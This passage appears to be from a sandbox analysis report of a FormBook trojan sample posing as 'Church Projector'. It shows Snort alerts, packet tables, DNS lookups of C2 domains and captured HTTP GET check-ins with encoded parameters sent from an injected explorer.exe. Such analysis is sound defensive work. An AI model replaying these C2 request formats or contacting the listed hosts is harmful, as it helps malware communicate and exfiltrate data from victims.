                                                                              ProductVersion2.0
                                                                              FileDescriptionChurch Projector
                                                                              OriginalFilenameOnSerializedAttribute.exe

                                                                              Network Behavior

                                                                              Snort IDS Alerts

                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                              05/04/21-18:40:11.893380TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976180192.168.2.4184.168.131.241
                                                                              05/04/21-18:40:11.893380TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976180192.168.2.4184.168.131.241
                                                                              05/04/21-18:40:11.893380TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976180192.168.2.4184.168.131.241
                                                                              05/04/21-18:40:37.667261TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.434.102.136.180
                                                                              05/04/21-18:40:37.667261TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.434.102.136.180
                                                                              05/04/21-18:40:37.667261TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976380192.168.2.434.102.136.180
                                                                              05/04/21-18:40:37.868899TCP1201ATTACK-RESPONSES 403 Forbidden804976334.102.136.180192.168.2.4
                                                                              05/04/21-18:40:43.289161TCP1201ATTACK-RESPONSES 403 Forbidden804976534.102.136.180192.168.2.4
                                                                              05/04/21-18:41:11.497022TCP1201ATTACK-RESPONSES 403 Forbidden804977034.102.136.180192.168.2.4

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 4, 2021 18:40:05.923744917 CEST | 49760 | 80 | 192.168.2.4 | 184.168.131.241
May 4, 2021 18:40:06.123193026 CEST | 80 | 49760 | 184.168.131.241 | 192.168.2.4
May 4, 2021 18:40:06.124036074 CEST | 49760 | 80 | 192.168.2.4 | 184.168.131.241
May 4, 2021 18:40:06.124053001 CEST | 49760 | 80 | 192.168.2.4 | 184.168.131.241
May 4, 2021 18:40:06.324815035 CEST | 80 | 49760 | 184.168.131.241 | 192.168.2.4
May 4, 2021 18:40:06.357764959 CEST | 80 | 49760 | 184.168.131.241 | 192.168.2.4
May 4, 2021 18:40:06.357783079 CEST | 80 | 49760 | 184.168.131.241 | 192.168.2.4
May 4, 2021 18:40:06.358078003 CEST | 49760 | 80 | 192.168.2.4 | 184.168.131.241
May 4, 2021 18:40:06.358093977 CEST | 49760 | 80 | 192.168.2.4 | 184.168.131.241
May 4, 2021 18:40:06.557281017 CEST | 80 | 49760 | 184.168.131.241 | 192.168.2.4
May 4, 2021 18:40:11.698854923 CEST | 49761 | 80 | 192.168.2.4 | 184.168.131.241
May 4, 2021 18:40:11.893053055 CEST | 80 | 49761 | 184.168.131.241 | 192.168.2.4
May 4, 2021 18:40:11.893363953 CEST | 49761 | 80 | 192.168.2.4 | 184.168.131.241
May 4, 2021 18:40:11.893379927 CEST | 49761 | 80 | 192.168.2.4 | 184.168.131.241
May 4, 2021 18:40:12.089917898 CEST | 80 | 49761 | 184.168.131.241 | 192.168.2.4
May 4, 2021 18:40:12.124341011 CEST | 80 | 49761 | 184.168.131.241 | 192.168.2.4
May 4, 2021 18:40:12.124362946 CEST | 80 | 49761 | 184.168.131.241 | 192.168.2.4
May 4, 2021 18:40:12.124597073 CEST | 49761 | 80 | 192.168.2.4 | 184.168.131.241
May 4, 2021 18:40:12.124614000 CEST | 49761 | 80 | 192.168.2.4 | 184.168.131.241
May 4, 2021 18:40:12.317548990 CEST | 80 | 49761 | 184.168.131.241 | 192.168.2.4
May 4, 2021 18:40:37.625993013 CEST | 49763 | 80 | 192.168.2.4 | 34.102.136.180
May 4, 2021 18:40:37.666980982 CEST | 80 | 49763 | 34.102.136.180 | 192.168.2.4
May 4, 2021 18:40:37.667131901 CEST | 49763 | 80 | 192.168.2.4 | 34.102.136.180
May 4, 2021 18:40:37.667260885 CEST | 49763 | 80 | 192.168.2.4 | 34.102.136.180
May 4, 2021 18:40:37.708126068 CEST | 80 | 49763 | 34.102.136.180 | 192.168.2.4
May 4, 2021 18:40:37.868899107 CEST | 80 | 49763 | 34.102.136.180 | 192.168.2.4
May 4, 2021 18:40:37.868921041 CEST | 80 | 49763 | 34.102.136.180 | 192.168.2.4
May 4, 2021 18:40:37.869244099 CEST | 49763 | 80 | 192.168.2.4 | 34.102.136.180
May 4, 2021 18:40:37.869275093 CEST | 49763 | 80 | 192.168.2.4 | 34.102.136.180
May 4, 2021 18:40:37.910165071 CEST | 80 | 49763 | 34.102.136.180 | 192.168.2.4
May 4, 2021 18:40:42.954565048 CEST | 49765 | 80 | 192.168.2.4 | 34.102.136.180
May 4, 2021 18:40:42.995554924 CEST | 80 | 49765 | 34.102.136.180 | 192.168.2.4
May 4, 2021 18:40:42.995910883 CEST | 49765 | 80 | 192.168.2.4 | 34.102.136.180
May 4, 2021 18:40:42.996263027 CEST | 49765 | 80 | 192.168.2.4 | 34.102.136.180
May 4, 2021 18:40:43.037198067 CEST | 80 | 49765 | 34.102.136.180 | 192.168.2.4
May 4, 2021 18:40:43.289160967 CEST | 80 | 49765 | 34.102.136.180 | 192.168.2.4
May 4, 2021 18:40:43.289185047 CEST | 80 | 49765 | 34.102.136.180 | 192.168.2.4
May 4, 2021 18:40:43.289745092 CEST | 49765 | 80 | 192.168.2.4 | 34.102.136.180
May 4, 2021 18:40:43.289786100 CEST | 49765 | 80 | 192.168.2.4 | 34.102.136.180
May 4, 2021 18:40:43.330719948 CEST | 80 | 49765 | 34.102.136.180 | 192.168.2.4
May 4, 2021 18:40:48.383549929 CEST | 49766 | 80 | 192.168.2.4 | 198.54.117.216
May 4, 2021 18:40:48.587084055 CEST | 80 | 49766 | 198.54.117.216 | 192.168.2.4
May 4, 2021 18:40:48.587832928 CEST | 49766 | 80 | 192.168.2.4 | 198.54.117.216
May 4, 2021 18:40:49.213042974 CEST | 49766 | 80 | 192.168.2.4 | 198.54.117.216
May 4, 2021 18:40:49.417438984 CEST | 80 | 49766 | 198.54.117.216 | 192.168.2.4
May 4, 2021 18:40:49.417567968 CEST | 80 | 49766 | 198.54.117.216 | 192.168.2.4
May 4, 2021 18:40:54.522350073 CEST | 49767 | 80 | 192.168.2.4 | 107.180.51.23
May 4, 2021 18:40:54.654962063 CEST | 80 | 49767 | 107.180.51.23 | 192.168.2.4
May 4, 2021 18:40:54.655168056 CEST | 49767 | 80 | 192.168.2.4 | 107.180.51.23
May 4, 2021 18:40:54.655491114 CEST | 49767 | 80 | 192.168.2.4 | 107.180.51.23
May 4, 2021 18:40:54.790168047 CEST | 80 | 49767 | 107.180.51.23 | 192.168.2.4
May 4, 2021 18:40:55.149972916 CEST | 49767 | 80 | 192.168.2.4 | 107.180.51.23
May 4, 2021 18:40:55.324285984 CEST | 80 | 49767 | 107.180.51.23 | 192.168.2.4
May 4, 2021 18:40:55.565521955 CEST | 80 | 49767 | 107.180.51.23 | 192.168.2.4
May 4, 2021 18:40:55.565546989 CEST | 80 | 49767 | 107.180.51.23 | 192.168.2.4
May 4, 2021 18:40:55.565664053 CEST | 49767 | 80 | 192.168.2.4 | 107.180.51.23
May 4, 2021 18:40:55.565695047 CEST | 49767 | 80 | 192.168.2.4 | 107.180.51.23
May 4, 2021 18:41:00.382936954 CEST | 49768 | 80 | 192.168.2.4 | 172.247.179.61
May 4, 2021 18:41:00.597582102 CEST | 80 | 49768 | 172.247.179.61 | 192.168.2.4
May 4, 2021 18:41:00.597819090 CEST | 49768 | 80 | 192.168.2.4 | 172.247.179.61
May 4, 2021 18:41:00.597980022 CEST | 49768 | 80 | 192.168.2.4 | 172.247.179.61
May 4, 2021 18:41:00.813927889 CEST | 80 | 49768 | 172.247.179.61 | 192.168.2.4
May 4, 2021 18:41:00.817074060 CEST | 80 | 49768 | 172.247.179.61 | 192.168.2.4
May 4, 2021 18:41:00.817281961 CEST | 49768 | 80 | 192.168.2.4 | 172.247.179.61
May 4, 2021 18:41:00.817332029 CEST | 49768 | 80 | 192.168.2.4 | 172.247.179.61
May 4, 2021 18:41:01.031989098 CEST | 80 | 49768 | 172.247.179.61 | 192.168.2.4
May 4, 2021 18:41:11.251394987 CEST | 49770 | 80 | 192.168.2.4 | 34.102.136.180
May 4, 2021 18:41:11.292433977 CEST | 80 | 49770 | 34.102.136.180 | 192.168.2.4
May 4, 2021 18:41:11.294339895 CEST | 49770 | 80 | 192.168.2.4 | 34.102.136.180
May 4, 2021 18:41:11.294384956 CEST | 49770 | 80 | 192.168.2.4 | 34.102.136.180
May 4, 2021 18:41:11.335407019 CEST | 80 | 49770 | 34.102.136.180 | 192.168.2.4
May 4, 2021 18:41:11.497021914 CEST | 80 | 49770 | 34.102.136.180 | 192.168.2.4
May 4, 2021 18:41:11.497056007 CEST | 80 | 49770 | 34.102.136.180 | 192.168.2.4
May 4, 2021 18:41:11.497194052 CEST | 49770 | 80 | 192.168.2.4 | 34.102.136.180
May 4, 2021 18:41:11.497219086 CEST | 49770 | 80 | 192.168.2.4 | 34.102.136.180
May 4, 2021 18:41:11.538275957 CEST | 80 | 49770 | 34.102.136.180 | 192.168.2.4

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 4, 2021 18:38:54.024626017 CEST | 53 | 65298 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:38:54.025485992 CEST | 53 | 65298 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:38:54.268990993 CEST | 59123 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:38:54.330634117 CEST | 53 | 59123 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:38:55.011109114 CEST | 54531 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:38:55.074928045 CEST | 53 | 54531 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:38:55.537355900 CEST | 49714 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:38:55.585961103 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:38:56.369191885 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:38:56.417763948 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:38:57.321439981 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:38:57.370109081 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:38:58.314707994 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:38:58.363447905 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:38:59.156027079 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:38:59.213253975 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:00.725415945 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:00.777441025 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:01.888232946 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:01.940443993 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:02.905877113 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:02.954597950 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:03.954514980 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:04.004987001 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:04.944576025 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:04.996160030 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:05.830091000 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:05.879779100 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:06.929821968 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:06.981394053 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:07.703725100 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:07.752402067 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:08.508982897 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:08.557581902 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:10.943303108 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:10.994750977 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:11.739748001 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:11.788924932 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:12.730926037 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:12.779702902 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:13.722815990 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:13.771832943 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:15.879122972 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:15.928826094 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:24.070565939 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:24.121550083 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:45.333444118 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:45.443583012 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:46.129746914 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:46.243702888 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:46.968714952 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:47.028048992 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:47.536840916 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:47.593750000 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:48.269646883 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:48.327791929 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:49.094772100 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:49.154519081 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:49.239351034 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:49.282809019 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:49.290956020 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:49.349447012 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:49.796359062 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:49.911396027 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:50.620918989 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:50.677948952 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:51.735912085 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:51.787457943 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:39:52.639520884 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:39:52.689064980 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:40:04.444891930 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:40:04.504713058 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:40:05.845329046 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:40:05.918068886 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:40:11.368455887 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:40:11.437558889 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:40:17.135504961 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:40:17.205519915 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:40:22.243833065 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:40:22.302524090 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:40:27.308279037 CEST | 52752 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:40:27.432954073 CEST | 53 | 52752 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:40:32.453119040 CEST | 60542 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:40:32.517307043 CEST | 53 | 60542 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:40:35.333406925 CEST | 60689 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:40:35.385313988 CEST | 53 | 60689 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:40:37.547240973 CEST | 64206 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:40:37.566108942 CEST | 50904 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:40:37.624808073 CEST | 53 | 64206 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:40:37.639240026 CEST | 53 | 50904 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:40:42.891275883 CEST | 57525 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:40:42.952469110 CEST | 53 | 57525 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:40:48.309123039 CEST | 53814 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:40:48.381818056 CEST | 53 | 53814 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:40:54.461986065 CEST | 53418 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:40:54.520982981 CEST | 53 | 53418 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:41:00.170859098 CEST | 62833 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:41:00.381505013 CEST | 53 | 62833 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:41:05.823858023 CEST | 59260 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:41:05.892970085 CEST | 53 | 59260 | 8.8.8.8 | 192.168.2.4
May 4, 2021 18:41:11.189289093 CEST | 49944 | 53 | 192.168.2.4 | 8.8.8.8
May 4, 2021 18:41:11.250770092 CEST | 53 | 49944 | 8.8.8.8 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 4, 2021 18:40:05.845329046 CEST | 192.168.2.4 | 8.8.8.8 | 0xc5d1 | Standard query (0) | www.kayandbernard.com | A (IP address) | IN (0x0001)
May 4, 2021 18:40:11.368455887 CEST | 192.168.2.4 | 8.8.8.8 | 0x908e | Standard query (0) | www.palomachurch.com | A (IP address) | IN (0x0001)
May 4, 2021 18:40:17.135504961 CEST | 192.168.2.4 | 8.8.8.8 | 0x5848 | Standard query (0) | www.fnatic-skins.club | A (IP address) | IN (0x0001)
May 4, 2021 18:40:22.243833065 CEST | 192.168.2.4 | 8.8.8.8 | 0x8bda | Standard query (0) | www.cats16.com | A (IP address) | IN (0x0001)
May 4, 2021 18:40:27.308279037 CEST | 192.168.2.4 | 8.8.8.8 | 0x8589 | Standard query (0) | www.benleefoto.com | A (IP address) | IN (0x0001)
May 4, 2021 18:40:32.453119040 CEST | 192.168.2.4 | 8.8.8.8 | 0x17f9 | Standard query (0) | www.web-evo.com | A (IP address) | IN (0x0001)
May 4, 2021 18:40:37.547240973 CEST | 192.168.2.4 | 8.8.8.8 | 0x7eb8 | Standard query (0) | www.gb-contracting.com | A (IP address) | IN (0x0001)
May 4, 2021 18:40:42.891275883 CEST | 192.168.2.4 | 8.8.8.8 | 0x2edd | Standard query (0) | www.effectivemarketinginc.com | A (IP address) | IN (0x0001)
May 4, 2021 18:40:48.309123039 CEST | 192.168.2.4 | 8.8.8.8 | 0x5ec0 | Standard query (0) | www.donelys.com | A (IP address) | IN (0x0001)
May 4, 2021 18:40:54.461986065 CEST | 192.168.2.4 | 8.8.8.8 | 0xf194 | Standard query (0) | www.timbraunmusician.com | A (IP address) | IN (0x0001)
May 4, 2021 18:41:00.170859098 CEST | 192.168.2.4 | 8.8.8.8 | 0x7c0e | Standard query (0) | www.anygivenrunday.com | A (IP address) | IN (0x0001)
May 4, 2021 18:41:05.823858023 CEST | 192.168.2.4 | 8.8.8.8 | 0x13ea | Standard query (0) | www.mollysmulligan.com | A (IP address) | IN (0x0001)
May 4, 2021 18:41:11.189289093 CEST | 192.168.2.4 | 8.8.8.8 | 0xf6ca | Standard query (0) | www.2000deal.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 4, 2021 18:40:05.918068886 CEST | 8.8.8.8 | 192.168.2.4 | 0xc5d1 | No error (0) | www.kayandbernard.com | kayandbernard.com |  | CNAME (Canonical name) | IN (0x0001)
May 4, 2021 18:40:05.918068886 CEST | 8.8.8.8 | 192.168.2.4 | 0xc5d1 | No error (0) | kayandbernard.com |  | 184.168.131.241 | A (IP address) | IN (0x0001)
May 4, 2021 18:40:11.437558889 CEST | 8.8.8.8 | 192.168.2.4 | 0x908e | No error (0) | www.palomachurch.com | palomachurch.com |  | CNAME (Canonical name) | IN (0x0001)
May 4, 2021 18:40:11.437558889 CEST | 8.8.8.8 | 192.168.2.4 | 0x908e | No error (0) | palomachurch.com |  | 184.168.131.241 | A (IP address) | IN (0x0001)
May 4, 2021 18:40:17.205519915 CEST | 8.8.8.8 | 192.168.2.4 | 0x5848 | Name error (3) | www.fnatic-skins.club | none | none | A (IP address) | IN (0x0001)
May 4, 2021 18:40:22.302524090 CEST | 8.8.8.8 | 192.168.2.4 | 0x8bda | Name error (3) | www.cats16.com | none | none | A (IP address) | IN (0x0001)
May 4, 2021 18:40:27.432954073 CEST | 8.8.8.8 | 192.168.2.4 | 0x8589 | Server failure (2) | www.benleefoto.com | none | none | A (IP address) | IN (0x0001)
May 4, 2021 18:40:32.517307043 CEST | 8.8.8.8 | 192.168.2.4 | 0x17f9 | Name error (3) | www.web-evo.com | none | none | A (IP address) | IN (0x0001)
May 4, 2021 18:40:37.624808073 CEST | 8.8.8.8 | 192.168.2.4 | 0x7eb8 | No error (0) | www.gb-contracting.com | gb-contracting.com |  | CNAME (Canonical name) | IN (0x0001)
May 4, 2021 18:40:37.624808073 CEST | 8.8.8.8 | 192.168.2.4 | 0x7eb8 | No error (0) | gb-contracting.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
May 4, 2021 18:40:42.952469110 CEST | 8.8.8.8 | 192.168.2.4 | 0x2edd | No error (0) | www.effectivemarketinginc.com | effectivemarketinginc.com |  | CNAME (Canonical name) | IN (0x0001)
May 4, 2021 18:40:42.952469110 CEST | 8.8.8.8 | 192.168.2.4 | 0x2edd | No error (0) | effectivemarketinginc.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
May 4, 2021 18:40:48.381818056 CEST | 8.8.8.8 | 192.168.2.4 | 0x5ec0 | No error (0) | www.donelys.com | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001)
May 4, 2021 18:40:48.381818056 CEST | 8.8.8.8 | 192.168.2.4 | 0x5ec0 | No error (0) | parkingpage.namecheap.com |  | 198.54.117.216 | A (IP address) | IN (0x0001)
May 4, 2021 18:40:48.381818056 CEST | 8.8.8.8 | 192.168.2.4 | 0x5ec0 | No error (0) | parkingpage.namecheap.com |  | 198.54.117.212 | A (IP address) | IN (0x0001)
May 4, 2021 18:40:48.381818056 CEST | 8.8.8.8 | 192.168.2.4 | 0x5ec0 | No error (0) | parkingpage.namecheap.com |  | 198.54.117.218 | A (IP address) | IN (0x0001)
May 4, 2021 18:40:48.381818056 CEST | 8.8.8.8 | 192.168.2.4 | 0x5ec0 | No error (0) | parkingpage.namecheap.com |  | 198.54.117.211 | A (IP address) | IN (0x0001)
May 4, 2021 18:40:48.381818056 CEST | 8.8.8.8 | 192.168.2.4 | 0x5ec0 | No error (0) | parkingpage.namecheap.com |  | 198.54.117.210 | A (IP address) | IN (0x0001)
May 4, 2021 18:40:48.381818056 CEST | 8.8.8.8 | 192.168.2.4 | 0x5ec0 | No error (0) | parkingpage.namecheap.com |  | 198.54.117.217 | A (IP address) | IN (0x0001)
May 4, 2021 18:40:48.381818056 CEST | 8.8.8.8 | 192.168.2.4 | 0x5ec0 | No error (0) | parkingpage.namecheap.com |  | 198.54.117.215 | A (IP address) | IN (0x0001)
May 4, 2021 18:40:54.520982981 CEST | 8.8.8.8 | 192.168.2.4 | 0xf194 | No error (0) | www.timbraunmusician.com | timbraunmusician.com |  | CNAME (Canonical name) | IN (0x0001)
May 4, 2021 18:40:54.520982981 CEST | 8.8.8.8 | 192.168.2.4 | 0xf194 | No error (0) | timbraunmusician.com |  | 107.180.51.23 | A (IP address) | IN (0x0001)
May 4, 2021 18:41:00.381505013 CEST | 8.8.8.8 | 192.168.2.4 | 0x7c0e | No error (0) | www.anygivenrunday.com |  | 172.247.179.61 | A (IP address) | IN (0x0001)
May 4, 2021 18:41:05.892970085 CEST | 8.8.8.8 | 192.168.2.4 | 0x13ea | No error (0) | www.mollysmulligan.com |  | 3.13.31.214 | A (IP address) | IN (0x0001)
May 4, 2021 18:41:11.250770092 CEST | 8.8.8.8 | 192.168.2.4 | 0xf6ca | No error (0) | www.2000deal.com | 2000deal.com |  | CNAME (Canonical name) | IN (0x0001)
May 4, 2021 18:41:11.250770092 CEST | 8.8.8.8 | 192.168.2.4 | 0xf6ca | No error (0) | 2000deal.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)

                                                                              HTTP Request Dependency Graph

                                                                              • www.kayandbernard.com
                                                                              • www.palomachurch.com
                                                                              • www.gb-contracting.com
                                                                              • www.effectivemarketinginc.com
                                                                              • www.donelys.com
                                                                              • www.timbraunmusician.com
                                                                              • www.anygivenrunday.com
                                                                              • www.2000deal.com

                                                                              HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49760 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 18:40:06.124053001 CEST | 5022 | OUT | GET /8u3b/?DzrXY=W0cOTmFEbnIJWZ9bmCGSrxqzq+x0vekMOKZqlI6Zx++4S/b9RAwggujLJglRzC1NYopM&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1
Host: www.kayandbernard.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 4, 2021 18:40:06.357764959 CEST | 5024 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx/1.16.1
Date: Tue, 04 May 2021 16:40:06 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Location: https://www.zola.com/wedding/kayandbernard?DzrXY=W0cOTmFEbnIJWZ9bmCGSrxqzq+x0vekMOKZqlI6Zx++4S/b9RAwggujLJglRzC1NYopM&zR-4v=0v1D8ZZ8otVT4F9P
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49761 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 18:40:11.893379927 CEST | 5519 | OUT | GET /8u3b/?DzrXY=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU4DyS4zVRk0C&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1
Host: www.palomachurch.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 4, 2021 18:40:12.124341011 CEST | 5520 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx/1.16.1
Date: Tue, 04 May 2021 16:40:12 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Location: http://www.palomachurch.org/8u3b/?DzrXY=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU4DyS4zVRk0C&zR-4v=0v1D8ZZ8otVT4F9P
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49763 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 4, 2021 18:40:37.667260885 CEST | 5532 | OUT | GET /8u3b/?DzrXY=OOVfeLyiAWIpMBFTQ6m1xWirhq5hDDYdrnFBGiAZzRO7gqk2ccIpVztzXoI7ESdS0nQl&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1
Host: www.gb-contracting.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 4, 2021 18:40:37.868899107 CEST | 5539 | IN | HTTP/1.1 403 Forbidden
Server: openresty
